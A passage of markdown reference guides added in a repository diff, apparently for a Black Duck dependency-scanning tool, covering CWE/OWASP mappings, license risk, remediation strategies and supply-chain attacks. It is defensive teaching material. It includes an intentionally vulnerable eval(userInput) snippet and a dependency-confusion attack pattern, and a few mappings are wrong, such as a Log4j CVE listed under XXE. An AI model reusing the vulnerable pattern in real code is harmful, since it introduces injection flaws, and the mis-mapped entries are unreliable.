- CVE-2020-36518 (Jackson) - Denial of Service via deeply nested objects
### XML External Entity (XXE)
**OWASP**: A05:2021 - Security Misconfiguration
**CWE**: CWE-611 (XML External Entities)
Common in:
- XML parsers with external entity processing enabled by default
- SOAP/XML-RPC libraries
**Example CVEs**:
- CVE-2021-44832 (Log4j) - Remote Code Execution
- CVE-2018-1000613 (dom4j) - XXE vulnerability
## OWASP Top 10 2021 Mapping
### A01:2021 - Broken Access Control
**Related CWEs**:
- CWE-22: Path Traversal
- CWE-284: Improper Access Control
- CWE-639: Insecure Direct Object Reference
**Dependency Examples**:
- File handling libraries with path traversal
- Authorization libraries with bypass vulnerabilities
- API frameworks with missing access controls
### A02:2021 - Cryptographic Failures
**Related CWEs**:
- CWE-327: Use of Broken Cryptography
- CWE-328: Weak Hash
- CWE-331: Insufficient Entropy
**Dependency Examples**:
- Outdated OpenSSL/BoringSSL versions
- Weak hash implementations (MD5, SHA1)
- Insecure random number generators
### A03:2021 - Injection
**Related CWEs**:
- CWE-89: SQL Injection
- CWE-78: OS Command Injection
- CWE-94: Code Injection
**Dependency Examples**:
- ORM libraries with unsafe queries
- Template engines with code execution
- Shell command utilities
### A04:2021 - Insecure Design
**Related CWEs**:
- CWE-209: Information Exposure Through Error Messages
- CWE-256: Plaintext Storage of Password
- CWE-918: SSRF
**Dependency Examples**:
- Libraries with verbose error messages
- Frameworks with insecure defaults
- HTTP clients vulnerable to SSRF
### A05:2021 - Security Misconfiguration
**Related CWEs**:
- CWE-611: XXE
- CWE-16: Configuration
- CWE-2: Environmental Security
**Dependency Examples**:
- XML parsers with XXE by default
- Web frameworks with debug mode enabled
- Default credentials in libraries
### A06:2021 - Vulnerable and Outdated Components
**Related CWEs**:
- CWE-1035: 2014 Top 25 - Insecure Interaction
- CWE-1104: Use of Unmaintained Third Party Components
**This is the primary focus of SCA tools like Black Duck**
Key risks:
- Dependencies with known CVEs
- Unmaintained or abandoned libraries
- Transitive dependencies with vulnerabilities
- License compliance issues
### A07:2021 - Identification and Authentication Failures
**Related CWEs**:
- CWE-287: Improper Authentication
- CWE-306: Missing Authentication
- CWE-798: Hard-coded Credentials
**Dependency Examples**:
- OAuth/OIDC libraries with bypass vulnerabilities
- JWT libraries with algorithm confusion
- Session management libraries with fixation issues
### A08:2021 - Software and Data Integrity Failures
**Related CWEs**:
- CWE-502: Deserialization of Untrusted Data
- CWE-829: Inclusion of Functionality from Untrusted Control Sphere
- CWE-494: Download of Code Without Integrity Check
**Dependency Examples**:
- Serialization libraries (Jackson, pickle, etc.)
- Package managers vulnerable to dependency confusion
- Libraries fetching code over HTTP
### A09:2021 - Security Logging and Monitoring Failures
**Related CWEs**:
- CWE-778: Insufficient Logging
- CWE-117: Log Injection
- CWE-532: Information Exposure Through Log Files
**Dependency Examples**:
- Logging libraries with injection vulnerabilities (Log4Shell)
- Frameworks with insufficient audit logging
- Libraries exposing sensitive data in logs
### A10:2021 - Server-Side Request Forgery (SSRF)
**Related CWEs**:
- CWE-918: SSRF
**Dependency Examples**:
- HTTP client libraries with insufficient validation
- URL parsing libraries with bypass issues
- Image processing libraries fetching remote resources
## CWE Top 25 Mapping
### Top 5 Most Dangerous in Dependencies
1. **CWE-502: Deserialization of Untrusted Data**
- Found in: Java (Jackson, XStream), Python (pickle), .NET
- CVSS typically: 9.0-10.0
- Remediation: Upgrade to patched versions, avoid deserializing untrusted data
2. **CWE-78: OS Command Injection**
- Found in: Shell utilities, process execution libraries
- CVSS typically: 8.0-9.8
- Remediation: Use parameterized APIs, input validation
3. **CWE-89: SQL Injection**
- Found in: Database drivers, ORM libraries
- CVSS typically: 8.0-9.8
- Remediation: Use parameterized queries, upgrade to patched versions
4. **CWE-79: Cross-site Scripting (XSS)**
- Found in: Template engines, HTML sanitization libraries
- CVSS typically: 6.1-7.5
- Remediation: Context-aware output encoding, upgrade libraries
5. **CWE-611: XML External Entity (XXE)**
- Found in: XML parsers (dom4j, Xerces, etc.)
- CVSS typically: 7.5-9.1
- Remediation: Disable external entity processing, upgrade parsers
## Dependency Vulnerability Categories
### Remote Code Execution (RCE)
**Severity**: CRITICAL
**CVSS Range**: 9.0-10.0
**Common Patterns**:
- Deserialization vulnerabilities
- Template injection
- Expression language injection
- JNDI injection (Log4Shell)
**Remediation Priority**: IMMEDIATE
### Authentication Bypass
**Severity**: CRITICAL/HIGH
**CVSS Range**: 7.5-9.8
**Common Patterns**:
- JWT signature bypass
- OAuth implementation flaws
- Session fixation
- Hard-coded credentials
**Remediation Priority**: IMMEDIATE
### Information Disclosure
**Severity**: MEDIUM/HIGH
**CVSS Range**: 5.3-7.5
**Common Patterns**:
- Path traversal in file handlers
- XXE with data exfiltration
- Error messages exposing internals
- Memory disclosure bugs
**Remediation Priority**: HIGH
### Denial of Service (DoS)
**Severity**: MEDIUM
**CVSS Range**: 5.3-7.5
**Common Patterns**:
- Regular expression DoS (ReDoS)
- XML bomb attacks
- Resource exhaustion
- Algorithmic complexity attacks
**Remediation Priority**: MEDIUM (unless affecting critical services)
### Prototype Pollution (JavaScript)
**Severity**: HIGH
**CVSS Range**: 7.0-8.8
**Common Patterns**:
- Object merge/extend functions
- JSON parsing libraries
- Template engines
**Remediation Priority**: HIGH
## Supply Chain Attack Patterns
### Dependency Confusion
**CWE**: CWE-494 (Download of Code Without Integrity Check)
**Description**: Attacker publishes malicious package with same name as internal package to public registry.
**Detection**: Black Duck detects unexpected package sources and registry changes.
**Mitigation**:
- Use private registry with higher priority
- Implement package name reservations
- Enable registry allowlists
### Typosquatting
**CWE**: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)
**Description**: Malicious packages with names similar to popular packages.
**Detection**: Component quality analysis, community reputation scoring.
**Mitigation**:
- Review all new dependencies carefully
- Use dependency lock files
- Enable automated typosquatting detection
### Compromised Maintainer Accounts
**CWE**: CWE-1294 (Insecure Security Identifier Mechanism)
**Description**: Attacker gains access to legitimate package maintainer account.
**Detection**: Unexpected version updates, behavior changes, new maintainers.
**Mitigation**:
- Pin dependency versions
- Review all dependency updates
- Monitor for suspicious changes
## Remediation Priority Matrix
| Severity | Exploitability | Remediation Timeline |
|----------|---------------|---------------------|
| CRITICAL | High | 24-48 hours |
| HIGH | High | 1 week |
| HIGH | Low | 2 weeks |
| MEDIUM | High | 1 month |
| MEDIUM | Low | 3 months |
| LOW | Any | Next maintenance cycle |
**Factors influencing priority**:
- Exploit availability (PoC, Metasploit module, etc.)
- Attack surface (internet-facing vs. internal)
- Data sensitivity
- Compliance requirements
- Patch availability
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [NVD CVE Database](https://nvd.nist.gov/)
- [MITRE ATT&CK](https://attack.mitre.org/)
- [FIRST CVSS Calculator](https://www.first.org/cvss/calculator/3.1)

View File

@@ -0,0 +1,472 @@
# License Compliance Risk Assessment Guide
## Table of Contents
- [License Risk Categories](#license-risk-categories)
- [Common Open Source Licenses](#common-open-source-licenses)
- [License Compatibility](#license-compatibility)
- [Compliance Workflows](#compliance-workflows)
- [Legal Considerations](#legal-considerations)
## License Risk Categories
### High Risk - Copyleft (Strong)
**Licenses**: GPL-2.0, GPL-3.0, AGPL-3.0
**Characteristics**:
- Requires derivative works to be open-sourced under same license
- Source code distribution mandatory
- AGPL extends to network use (SaaS applications)
**Business Impact**: HIGH
- May require releasing proprietary code as open source
- Incompatible with most commercial software
- Legal review required for any usage
**Use Cases Where Allowed**:
- Internal tools (not distributed)
- Separate services with network boundaries
- Dual-licensed components (use commercial license)
**Example Compliance Violation**:
```
Product: Commercial SaaS Application
Dependency: GPL-licensed library linked into application
Issue: AGPL requires source code release for network-accessible software
Risk: Legal liability, forced open-sourcing
```
### Medium Risk - Weak Copyleft
**Licenses**: LGPL-2.1, LGPL-3.0, MPL-2.0, EPL-2.0
**Characteristics**:
- Copyleft applies only to modified library files
- Allows proprietary applications if library used as separate component
- Source modifications must be released
**Business Impact**: MEDIUM
- Safe if used as unmodified library (dynamic linking)
- Modifications require open-sourcing
- License compatibility considerations
**Compliance Requirements**:
- Keep library as separate, unmodified component
- If modified, release modifications under same license
- Attribute properly in documentation
**Example Safe Usage**:
```
Product: Commercial Application
Dependency: LGPL library via dynamic linking
Status: COMPLIANT
Reason: No modifications, used as separate component
```
### Low Risk - Permissive
**Licenses**: MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause
**Characteristics**:
- Minimal restrictions on use and distribution
- No copyleft requirements
- Attribution required
- Apache-2.0 includes patent grant
**Business Impact**: LOW
- Generally safe for commercial use
- Simple compliance requirements
- Industry standard for most projects
**Compliance Requirements**:
- Include license text in distribution
- Preserve copyright notices
- Apache-2.0: Include NOTICE file if present
### Minimal Risk - Public Domain / Unlicense
**Licenses**: CC0-1.0, Unlicense, Public Domain
**Characteristics**:
- No restrictions
- No attribution required (though recommended)
**Business Impact**: MINIMAL
- Safest for commercial use
- No compliance obligations
## Common Open Source Licenses
### Permissive Licenses
#### MIT License
**SPDX**: MIT
**OSI Approved**: Yes
**Risk Level**: LOW
**Permissions**: Commercial use, modification, distribution, private use
**Conditions**: Include license and copyright notice
**Limitations**: No liability, no warranty
**Common in**: JavaScript (React, Angular), Ruby (Rails)
**Compliance Checklist**:
- [ ] Include LICENSE file in distribution
- [ ] Preserve copyright notices in source files
- [ ] Credit in ABOUT/CREDITS file
#### Apache License 2.0
**SPDX**: Apache-2.0
**OSI Approved**: Yes
**Risk Level**: LOW
**Permissions**: Same as MIT, plus explicit patent grant
**Conditions**: Include license, preserve NOTICE file, state changes
**Limitations**: No trademark use, no liability
**Common in**: Java (Spring), Big Data (Hadoop, Kafka)
**Key Difference from MIT**: Patent protection clause
**Compliance Checklist**:
- [ ] Include LICENSE file
- [ ] Include NOTICE file if present
- [ ] Document modifications
- [ ] Don't use project trademarks
#### BSD Licenses (2-Clause and 3-Clause)
**SPDX**: BSD-2-Clause, BSD-3-Clause
**OSI Approved**: Yes
**Risk Level**: LOW
**3-Clause Addition**: No endorsement using project name
**Common in**: Unix utilities, networking libraries
**Compliance Checklist**:
- [ ] Include license text
- [ ] Preserve copyright notices
- [ ] BSD-3: No unauthorized endorsements
### Weak Copyleft Licenses
#### GNU LGPL 2.1 / 3.0
**SPDX**: LGPL-2.1, LGPL-3.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM
**Safe Usage Patterns**:
1. **Dynamic Linking**: Link as shared library without modification
2. **Unmodified Use**: Use library as-is without code changes
3. **Separate Component**: Keep as distinct, replaceable module
**Unsafe Usage Patterns**:
1. **Static Linking**: Compiling LGPL code into proprietary binary
2. **Modifications**: Changing LGPL library code
3. **Intimate Integration**: Tightly coupling with proprietary code
**Common in**: GTK, glibc, Qt (dual-licensed)
**Compliance for Unmodified Use**:
- [ ] Provide library source code or offer to provide
- [ ] Allow users to replace library
- [ ] Include license text
**Compliance for Modifications**:
- [ ] Release modifications under LGPL
- [ ] Provide modified source code
- [ ] Document changes
#### Mozilla Public License 2.0
**SPDX**: MPL-2.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM
**File-Level Copyleft**: Only modified files must remain MPL
**Common in**: Firefox, Rust standard library
**Compliance**:
- [ ] Keep MPL files in separate files
- [ ] Release modifications to MPL files
- [ ] May combine with proprietary code at module level
### Strong Copyleft Licenses
#### GNU GPL 2.0 / 3.0
**SPDX**: GPL-2.0, GPL-3.0
**OSI Approved**: Yes
**Risk Level**: HIGH
**Copyleft Scope**: Entire program must be GPL
**Key Differences**:
- **GPL-3.0**: Added anti-tivoization, patent provisions
- **GPL-2.0**: More permissive for hardware restrictions
**Common in**: Linux kernel (GPL-2.0), many GNU tools
**When GPL is Acceptable**:
1. **Internal Use**: Not distributed outside organization
2. **Network Boundary**: Separate GPL service (API-based)
3. **Dual-Licensed**: Use commercial license option
**Compliance if Using**:
- [ ] Entire program must be GPL-compatible
- [ ] Provide source code to recipients
- [ ] Include license and build instructions
#### GNU AGPL 3.0
**SPDX**: AGPL-3.0
**OSI Approved**: Yes
**Risk Level**: CRITICAL for SaaS
**Network Copyleft**: Source code required even for network use
**Common in**: Some database tools, server software
**Critical for**: SaaS, web applications, APIs
**Avoid Unless**: Prepared to open-source entire application
### Proprietary / Commercial Licenses
**Risk Level**: VARIES (requires legal review)
**Common Scenarios**:
- Evaluation/trial licenses (non-production)
- Dual-licensed (commercial option available)
- Runtime licenses (e.g., database drivers)
**Compliance**: Follow vendor-specific terms
## License Compatibility
### Compatibility Matrix
| Your Project | MIT | Apache-2.0 | LGPL | GPL | AGPL |
|--------------|-----|-----------|------|-----|------|
| Proprietary | ✅ | ✅ | ⚠️ | ❌ | ❌ |
| MIT | ✅ | ✅ | ⚠️ | ❌ | ❌ |
| Apache-2.0 | ✅ | ✅ | ⚠️ | ⚠️ | ❌ |
| LGPL | ✅ | ✅ | ✅ | ⚠️ | ❌ |
| GPL | ✅ | ⚠️ | ✅ | ✅ | ⚠️ |
| AGPL | ✅ | ⚠️ | ✅ | ✅ | ✅ |
**Legend**:
- ✅ Compatible
- ⚠️ Compatible with conditions
- ❌ Incompatible
### Common Incompatibilities
**Apache-2.0 with GPL-2.0**:
- Issue: GPL-2.0 doesn't have explicit patent grant
- Solution: Use GPL-3.0 instead (compatible with Apache-2.0)
**GPL with Proprietary**:
- Issue: GPL requires derivative works be GPL
- Solution: Keep as separate program, use network boundary
**AGPL with SaaS**:
- Issue: AGPL triggers on network use
- Solution: Avoid AGPL or use commercial license
## Compliance Workflows
### Initial License Assessment
1. **Scan Dependencies**
```bash
scripts/blackduck_scan.py --project MyApp --version 1.0.0 --report-type license
```
2. **Categorize Licenses by Risk**
- Review all HIGH risk licenses immediately
- Assess MEDIUM risk licenses for compliance requirements
- Document LOW risk licenses for attribution
3. **Legal Review**
- Escalate HIGH risk licenses to legal team
- Get approval for MEDIUM risk usage patterns
- Document decisions
### Continuous License Monitoring
**In CI/CD Pipeline**:
```yaml
# GitHub Actions example
- name: License Compliance Check
run: |
scripts/blackduck_scan.py \
--project ${{ github.repository }} \
--version ${{ github.sha }} \
--report-type license \
--fail-on-blocklisted-licenses
```
**Policy Enforcement**:
- Block builds with GPL/AGPL dependencies
- Require approval for new LGPL dependencies
- Auto-approve MIT/Apache-2.0
### License Remediation
**For High-Risk Licenses**:
1. **Replace Component**
- Find MIT/Apache alternative
- Example: MySQL (GPL) → PostgreSQL (PostgreSQL License - permissive)
2. **Commercial License**
- Purchase commercial license if available
- Example: Qt (LGPL or Commercial)
3. **Separate Service**
- Run GPL component as separate service
- Communicate via API/network
4. **Remove Dependency**
- Implement functionality directly
- Use different approach
### Attribution and Notices
**Required Artifacts**:
**LICENSES.txt** - All license texts:
```
This software includes the following third-party components:
1. Component Name v1.0.0
License: MIT
Copyright (c) 2024 Author
[Full license text]
2. Another Component v2.0.0
License: Apache-2.0
[Full license text]
```
**NOTICE.txt** - Attribution notices (if Apache-2.0 dependencies):
```
This product includes software developed by
The Apache Software Foundation (http://www.apache.org/).
[Additional NOTICE content from Apache-licensed dependencies]
```
**UI/About Screen**:
- List major third-party components
- Link to full license information
- Provide "Open Source Licenses" section
## Legal Considerations
### When to Consult Legal Counsel
**Always Consult for**:
- GPL/AGPL in commercial products
- Dual-licensing decisions
- Patent-related concerns
- Proprietary license negotiations
- M&A due diligence
- License violations/disputes
### Common Legal Questions
**Q: Can I use GPL code in a SaaS application?**
A: GPL-2.0/3.0 yes (no distribution), AGPL-3.0 no (network use triggers copyleft)
**Q: What if I modify an MIT-licensed library?**
A: You can keep modifications proprietary, just preserve MIT license
**Q: Can I remove license headers from code?**
A: No, preserve all copyright and license notices
**Q: What's the difference between "linking" and "use"?**
A: Legal concept varies by jurisdiction; consult attorney for specific cases
### Audit and Compliance Documentation
**Maintain Records**:
- Complete SBOM with license information
- License review approvals
- Component selection rationale
- Exception approvals with expiration dates
**Quarterly Review**:
- Update license inventory
- Review new dependencies
- Renew/revoke exceptions
- Update attribution files
## Tools and Resources
**Black Duck Features**:
- Automated license detection
- License risk categorization
- Policy enforcement
- Bill of Materials with licenses
**Additional Tools**:
- FOSSA - License compliance automation
- WhiteSource - License management
- Snyk - License scanning
**Resources**:
- [SPDX License List](https://spdx.org/licenses/)
- [Choose A License](https://choosealicense.com/)
- [TL;DR Legal](https://tldrlegal.com/)
- [OSI Approved Licenses](https://opensource.org/licenses)
## License Risk Scorecard Template
```markdown
# License Risk Assessment: [Component Name]
**Component**: component-name@version
**License**: [SPDX ID]
**Risk Level**: [HIGH/MEDIUM/LOW]
## Usage Context
- [ ] Used in distributed product
- [ ] Used in SaaS/cloud service
- [ ] Internal tool only
- [ ] Modifications made: [Yes/No]
## Risk Assessment
- **Copyleft Trigger**: [Yes/No/Conditional]
- **Patent Concerns**: [Yes/No]
- **Commercial Use Allowed**: [Yes/No]
## Compliance Requirements
- [ ] Include license text
- [ ] Provide source code
- [ ] Include NOTICE file
- [ ] Preserve copyright notices
- [ ] Other: _______
## Decision
- [X] Approved for use
- [ ] Requires commercial license
- [ ] Find alternative
- [ ] Legal review pending
**Approved By**: [Name, Date]
**Review Date**: [Date]
```
## References
- [Open Source Initiative](https://opensource.org/)
- [Free Software Foundation](https://www.fsf.org/licensing/)
- [Linux Foundation - Open Compliance Program](https://www.linuxfoundation.org/projects/open-compliance)
- [Google Open Source License Guide](https://opensource.google/documentation/reference/thirdparty/licenses)

View File

@@ -0,0 +1,496 @@
# Vulnerability Remediation Strategies
## Table of Contents
- [Remediation Decision Framework](#remediation-decision-framework)
- [Strategy 1: Upgrade to Fixed Version](#strategy-1-upgrade-to-fixed-version)
- [Strategy 2: Apply Security Patch](#strategy-2-apply-security-patch)
- [Strategy 3: Replace Component](#strategy-3-replace-component)
- [Strategy 4: Implement Mitigations](#strategy-4-implement-mitigations)
- [Strategy 5: Risk Acceptance](#strategy-5-risk-acceptance)
- [Language-Specific Guidance](#language-specific-guidance)
## Remediation Decision Framework
```
Is patch/upgrade available?
├─ Yes → Can we upgrade without breaking changes?
│ ├─ Yes → UPGRADE (Strategy 1)
│ └─ No → Are breaking changes acceptable?
│ ├─ Yes → UPGRADE with refactoring (Strategy 1)
│ └─ No → Can we apply patch? (Strategy 2)
│ ├─ Yes → PATCH
│ └─ No → REPLACE or MITIGATE (Strategy 3/4)
└─ No → Is vulnerability exploitable in our context?
├─ Yes → Can we replace component?
│ ├─ Yes → REPLACE (Strategy 3)
│ └─ No → MITIGATE (Strategy 4)
└─ No → ACCEPT with justification (Strategy 5)
```
## Strategy 1: Upgrade to Fixed Version
**When to use**: Patch available in newer version, upgrade path is clear
**Priority**: HIGHEST - This is the preferred remediation method
### Upgrade Process
1. **Identify Fixed Version**
```bash
# Check Black Duck scan results for fixed version
# Verify in CVE database or component changelog
```
2. **Review Breaking Changes**
- Read release notes and changelog
- Check migration guides
- Review API changes and deprecations
3. **Update Dependency**
**Node.js/npm**:
```bash
npm install package-name@fixed-version
npm audit fix # Auto-fix where possible
```
**Python/pip**:
```bash
pip install package-name==fixed-version
pip-audit --fix # Auto-fix vulnerabilities
```
**Java/Maven**:
```xml
<dependency>
<groupId>org.example</groupId>
<artifactId>vulnerable-lib</artifactId>
<version>fixed-version</version>
</dependency>
```
**Ruby/Bundler**:
```bash
bundle update package-name
```
**.NET/NuGet**:
```bash
dotnet add package PackageName --version fixed-version
```
4. **Test Thoroughly**
- Run existing test suite
- Test affected functionality
- Perform integration testing
- Consider security-specific test cases
5. **Re-scan**
```bash
scripts/blackduck_scan.py --project MyApp --version 1.0.1
```
### Handling Breaking Changes
**Minor Breaking Changes**: Acceptable for security fixes
- Update function calls to new API
- Adjust configuration for new defaults
- Update type definitions
**Major Breaking Changes**: Requires planning
- Create feature branch for upgrade
- Refactor code incrementally
- Use adapter pattern for compatibility
- Consider gradual rollout
**Incompatible Changes**: May require alternative strategy
- Evaluate business impact
- Consider Strategy 3 (Replace)
- If critical, implement Strategy 4 (Mitigate) temporarily
## Strategy 2: Apply Security Patch
**When to use**: Vendor provides patch without full version upgrade
**Priority**: HIGH - Use when full upgrade is not feasible
### Patch Types
**Backported Patches**:
- Vendor provides patch for older version
- Common in LTS/enterprise distributions
- Apply using vendor's instructions
**Custom Patches**:
- Create patch from upstream fix
- Test extensively before deployment
- Document patch application process
### Patch Application Process
1. **Obtain Patch**
- Vendor security advisory
- GitHub commit/pull request
- Security mailing list
2. **Validate Patch**
```bash
# Review patch contents
git diff vulnerable-version..patched-version -- affected-file.js
# Verify patch signature if available
gpg --verify patch.sig patch.diff
```
3. **Apply Patch**
**Git-based**:
```bash
# Apply patch from file
git apply security-patch.diff
# Or cherry-pick specific commit
git cherry-pick security-fix-commit-sha
```
**Package manager overlay**:
```bash
# npm patch-package
npx patch-package package-name
# pip with local modifications
pip install -e ./patched-package
```
4. **Test and Verify**
- Verify vulnerability is fixed
- Run security scan
- Test functionality
5. **Document Patch**
- Create internal documentation
- Add to dependency management notes
- Set reminder for proper upgrade
## Strategy 3: Replace Component
**When to use**: No fix available, or component is unmaintained
**Priority**: MEDIUM-HIGH - Architectural change required
### Replacement Process
1. **Identify Alternatives**
**Evaluation Criteria**:
- Active maintenance (recent commits, releases)
- Security track record
- Community size and support
- Feature parity
- License compatibility
- Performance characteristics
**Research Sources**:
- Black Duck component quality metrics
- GitHub stars/forks/issues
- Security advisories history
- StackOverflow activity
- Production usage at scale
2. **Select Replacement**
**Example Replacements**:
| Vulnerable Component | Alternative | Reason |
|---------------------|-------------|--------|
| moment.js | date-fns, dayjs | No longer maintained |
| request (npm) | axios, node-fetch | Deprecated |
| xml2js | fast-xml-parser | XXE vulnerabilities |
| lodash (full) | lodash-es (specific functions) | Reduce attack surface |
3. **Plan Migration**
- Map API differences
- Identify all usage locations
- Create compatibility layer if needed
- Plan gradual migration if large codebase
4. **Execute Replacement**
```bash
# Remove vulnerable component
npm uninstall vulnerable-package
# Install replacement
npm install secure-alternative
# Update imports/requires across codebase
# Use tools like jscodeshift for automated refactoring
```
5. **Verify**
- Scan for residual references
- Test all affected code paths
- Re-scan with Black Duck
## Strategy 4: Implement Mitigations
**When to use**: No fix/replacement available, vulnerability cannot be eliminated
**Priority**: MEDIUM - Compensating controls required
### Mitigation Techniques
#### Input Validation and Sanitization
For injection vulnerabilities:
```javascript
// Before: Vulnerable to injection
const result = eval(userInput);
// Mitigation: Strict validation and safe alternatives
const allowlist = ['option1', 'option2'];
if (!allowlist.includes(userInput)) {
throw new Error('Invalid input');
}
const result = safeEvaluate(userInput);
```
#### Network Segmentation
For RCE/SSRF vulnerabilities:
- Deploy vulnerable component in isolated network segment
- Restrict outbound network access
- Use Web Application Firewall (WAF) rules
- Implement egress filtering
#### Access Controls
For authentication/authorization bypasses:
```python
# Additional validation layer
@require_additional_auth
def sensitive_operation():
# Vulnerable library call
vulnerable_lib.do_operation()
```
#### Runtime Protection
**Application Security Tools**:
- RASP (Runtime Application Self-Protection)
- Virtual patching via WAF
- Container security policies
**Example - WAF Rule**:
```nginx
# ModSecurity rule to block exploitation attempt
SecRule REQUEST_URI "@rx /vulnerable-endpoint" \
"id:1001,phase:1,deny,status:403,\
msg:'Blocked access to vulnerable component'"
```
#### Minimize Attack Surface
**Disable Vulnerable Features**:
```xml
<!-- Disable XXE in XML parser -->
<bean class="javax.xml.parsers.DocumentBuilderFactory">
<property name="features">
<map>
<entry key="http://apache.org/xml/features/disallow-doctype-decl" value="true"/>
<entry key="http://xml.org/sax/features/external-general-entities" value="false"/>
</map>
</property>
</bean>
```
**Remove Unused Code**:
```bash
# Remove unused dependencies
npm prune
pip-autoremove
# Tree-shake unused code
webpack --mode production # Removes unused exports
```
### Monitoring and Detection
Implement enhanced monitoring for vulnerable components:
```python
# Example: Log and alert on vulnerable code path usage
import logging
def wrap_vulnerable_function(original_func):
def wrapper(*args, **kwargs):
logging.warning(
"SECURITY: Vulnerable function called",
extra={
"function": original_func.__name__,
"args": args,
"caller": inspect.stack()[1]
}
)
# Alert security team
send_security_alert("Vulnerable code path executed")
return original_func(*args, **kwargs)
return wrapper
# Apply wrapper
vulnerable_lib.dangerous_function = wrap_vulnerable_function(
vulnerable_lib.dangerous_function
)
```
## Strategy 5: Risk Acceptance
**When to use**: Vulnerability is not exploitable in your context, or risk is acceptable
**Priority**: LOWEST - Only after thorough risk analysis
### Risk Acceptance Criteria
**Acceptable when ALL of these are true**:
1. Vulnerability is not exploitable in deployment context
2. Attack requires significant preconditions (e.g., admin access)
3. Vulnerable code path is never executed
4. Impact is negligible even if exploited
5. Mitigation cost exceeds risk
### Risk Acceptance Process
1. **Document Justification**
```markdown
# Risk Acceptance: CVE-2023-XXXXX in component-name
**Vulnerability**: SQL Injection in admin panel
**CVSS Score**: 8.5 (HIGH)
**Component**: admin-dashboard@1.2.3
**Justification for Acceptance**:
- Admin panel is only accessible to authenticated administrators
- Additional authentication layer required (2FA)
- Network access restricted to internal network only
- No sensitive data accessible via this component
- Monitoring in place for suspicious activity
**Mitigation Controls**:
- WAF rules blocking SQL injection patterns
- Enhanced logging on admin endpoints
- Network segmentation
- Regular security audits
**Review Date**: 2024-06-01
**Approved By**: CISO, Security Team Lead
**Next Review**: 2024-09-01
```
2. **Implement Compensating Controls**
- Enhanced monitoring
- Additional authentication layers
- Network restrictions
- Regular security reviews
3. **Set Review Schedule**
- Quarterly reviews for HIGH/CRITICAL
- Semi-annual for MEDIUM
- Annual for LOW
4. **Track in Black Duck**
```bash
# Mark as accepted risk in Black Duck with expiration
# Use Black Duck UI or API to create policy exception
```
## Language-Specific Guidance
### JavaScript/Node.js
**Tools**:
- `npm audit` - Built-in vulnerability scanner
- `npm audit fix` - Automatic remediation
- `yarn audit` - Yarn's vulnerability scanner
- `snyk` - Commercial SCA tool
**Best Practices**:
- Lock dependencies with `package-lock.json`
- Use `npm ci` in CI/CD for reproducible builds
- Audit transitive dependencies
- Consider `npm-force-resolutions` for forcing versions
### Python
**Tools**:
- `pip-audit` - Scan for vulnerabilities
- `safety` - Check against vulnerability database
- `pip-check` - Verify package compatibility
**Best Practices**:
- Use `requirements.txt` and `pip freeze`
- Pin exact versions for security-critical deps
- Use virtual environments
- Consider `pip-tools` for dependency management
### Java
**Tools**:
- OWASP Dependency-Check
- Snyk for Java
- Black Duck (commercial)
**Best Practices**:
- Use dependency management (Maven, Gradle)
- Lock versions in `pom.xml` or `build.gradle`
- Scan with `mvn dependency:tree` for transitive deps
- Use Maven Enforcer Plugin for version policies
### .NET
**Tools**:
- `dotnet list package --vulnerable`
- OWASP Dependency-Check
- WhiteSource Bolt
**Best Practices**:
- Use `PackageReference` in project files
- Lock versions with `packages.lock.json`
- Enable NuGet package validation
- Use `dotnet outdated` to track updates
### Ruby
**Tools**:
- `bundle audit` - Check for vulnerabilities
- `bundler-audit` - Automated checking
**Best Practices**:
- Use `Gemfile.lock` for reproducible deps
- Run `bundle audit` in CI/CD
- Update regularly with `bundle update`
- Use pessimistic version constraints
## Remediation Workflow Checklist
For each vulnerability:
- [ ] Identify vulnerability details (CVE, CVSS, affected versions)
- [ ] Determine if vulnerability is exploitable in your context
- [ ] Check for fixed version or patch availability
- [ ] Assess upgrade/patch complexity and breaking changes
- [ ] Select remediation strategy (Upgrade/Patch/Replace/Mitigate/Accept)
- [ ] Create remediation plan with timeline
- [ ] Execute remediation
- [ ] Test thoroughly (functionality + security)
- [ ] Re-scan with Black Duck to confirm fix
- [ ] Document changes and lessons learned
- [ ] Deploy to production with rollback plan
- [ ] Monitor for issues post-deployment
## References
- [NIST Vulnerability Management Guide](https://nvd.nist.gov/)
- [OWASP Dependency Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Snyk Vulnerability Database](https://security.snyk.io/)

View File

@@ -0,0 +1,588 @@
# Supply Chain Security Threats
## Table of Contents
- [Threat Overview](#threat-overview)
- [Attack Vectors](#attack-vectors)
- [Detection Strategies](#detection-strategies)
- [Prevention and Mitigation](#prevention-and-mitigation)
- [Incident Response](#incident-response)
## Threat Overview
Supply chain attacks target the software dependency ecosystem to compromise applications through malicious or vulnerable third-party components.
**Impact**: Critical - can affect thousands of downstream users
**Trend**: Increasing rapidly (651% increase 2021-2022)
**MITRE ATT&CK**: T1195 - Supply Chain Compromise
### Attack Categories
1. **Compromised Dependencies** - Legitimate packages backdoored by attackers
2. **Typosquatting** - Malicious packages with similar names
3. **Dependency Confusion** - Exploiting package resolution order
4. **Malicious Maintainers** - Attackers become maintainers
5. **Build System Compromise** - Injection during build/release process
## Attack Vectors
### 1. Dependency Confusion
**MITRE ATT&CK**: T1195.001
**CWE**: CWE-494 (Download of Code Without Integrity Check)
**Attack Description**:
Attackers publish malicious packages to public registries with same name as internal packages. Package managers may install public version instead of internal.
**Real-World Examples**:
- **2021**: Researcher demonstrated by uploading packages mimicking internal names at Microsoft, Apple, PayPal
- **Impact**: Potential code execution on build servers
**Attack Pattern**:
```
Internal Package Registry (private):
- company-auth-lib@1.0.0
Public Registry (npmjs.com):
- company-auth-lib@99.0.0 (MALICIOUS)
Package manager resolution:
npm install company-auth-lib
→ Installs v99.0.0 from public registry (higher version)
```
**Detection with Black Duck**:
- Unexpected package source changes
- Version spikes (jumping from 1.x to 99.x)
- Multiple registries for same package
- New publishers for established packages
**Prevention**:
```bash
# npm - use scoped packages for internal code
npm config set @company:registry https://npm.internal.company.com
# Configure .npmrc to prefer internal registry
@company:registry=https://npm.internal.company.com
registry=https://registry.npmjs.org
# Python - use index-url for internal PyPI
pip install --index-url https://pypi.internal.company.com package-name
# Maven - repository order matters
<repositories>
<repository>
<id>company-internal</id>
